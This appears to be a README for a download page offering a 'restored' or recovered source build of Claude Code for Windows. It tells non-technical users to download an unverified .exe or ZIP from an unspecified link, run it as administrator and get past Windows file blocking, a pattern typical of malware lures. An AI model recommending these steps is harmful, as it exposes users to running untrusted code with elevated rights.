claude-code-source is a restored source version of Claude Code v2.1.88. It is a terminal app built with TypeScript, React, and Ink. It gives you a text-based AI assistant that runs in a command window on Windows.
Use it if you want to:
- open an AI assistant in your terminal
- work with text in a simple command-line window
- run a local desktop-style interface with a terminal feel
- explore a recovered source build of Claude Code
Before you start, make sure your PC has:
- Windows 10 or Windows 11
- 2 GB of free disk space
- 4 GB of RAM or more
- a stable internet connection
- access to Windows Terminal, PowerShell, or Command Prompt
For the best result, use a current Windows system with standard user access.
Visit this page to download and run the app:
If the page opens a source or project page, look for the latest Windows build, release file, or setup file. If the repo includes a package or executable, download that file to your computer.
Follow these steps on a Windows PC:
- Open the download link in your browser.
- Save the file to a folder you can find again, such as Downloads or Desktop.
- If the file is a ZIP archive, right-click it and choose Extract All.
- Open the extracted folder.
- Look for a file named
claude-code-source.exe,setup.exe, or a similar Windows app file. - Double-click the file to start the app.
- If Windows asks for permission, choose Yes.
- If the app opens in a terminal window, wait for it to finish loading.
If you see a folder with scripts instead of an app file, open PowerShell in that folder and run the start file included in the project.
When you launch the app for the first time, it may:
- ask for account or login details
- open in a terminal window
- show a text-based screen with input prompts
- take a short time to load the interface
Type your request in the prompt and press Enter. The app will respond in the same window.
You can use claude-code-source for tasks like:
- asking questions in plain text
- drafting notes and messages
- getting help with code-related text
- reviewing small pieces of content
- working inside a terminal-based interface
Basic use:
- Start the app.
- Type your message.
- Press Enter.
- Read the response.
- Type another message if needed.
If the interface shows a command prompt, treat it like a chat window. You do not need programming knowledge to type a request.
The download may include files such as:
README.md— project instructionspackage.json— app setup filesrc— source filesdist— built app files.exe— Windows app file.zip— compressed download file
If you see a dist folder, it often means the app is ready to run. If you see only source files, follow the project setup steps in the repository.
If nothing happens when you open the app:
- Right-click the file and try Run as administrator.
- Check that Windows did not block the file.
- Make sure the file finished downloading.
- Move the folder to a simple path like
C:\Apps\claude-code-source. - Open the app again from that folder.
- Restart your PC and try once more.
If a terminal window opens and closes fast, start it from PowerShell so you can see the message on screen.
- Keep the terminal window open while you use the app.
- Use short prompts if you want fast replies.
- Copy text from the window if you need to save it.
- Resize the terminal window if the layout feels tight.
- Use a clear folder path if you run the app from files on your PC.
- Name: claude-code-source
- Version base: Claude Code v2.1.88
- Type: terminal AI assistant
- Stack: TypeScript, React, Ink
- Topic area: AI assistant, CLI, terminal, source map recovery
When the app works as intended, you should see:
- a terminal-based user interface
- text input for prompts
- AI responses in the same window
- a workflow that feels close to a chat session in the terminal
- fast access without a full desktop window
A typical project layout may look like this:
src/for app source codecomponents/for interface partsassets/for files used by the appdist/for built outputnode_modules/for installed packagesREADME.mdfor project notes
If the project uses a Node-based setup, the usual flow is:
- Open the project folder.
- Install the needed packages.
- Start the app from the terminal.
- Use the prompt inside the window.
If the repository includes a ready-to-run Windows file, use that file first.
ai, ai-assistant, anthropic, claude, claude-code, cli, ink, llm, react, reverse-engineering, source-map, terminal, typescript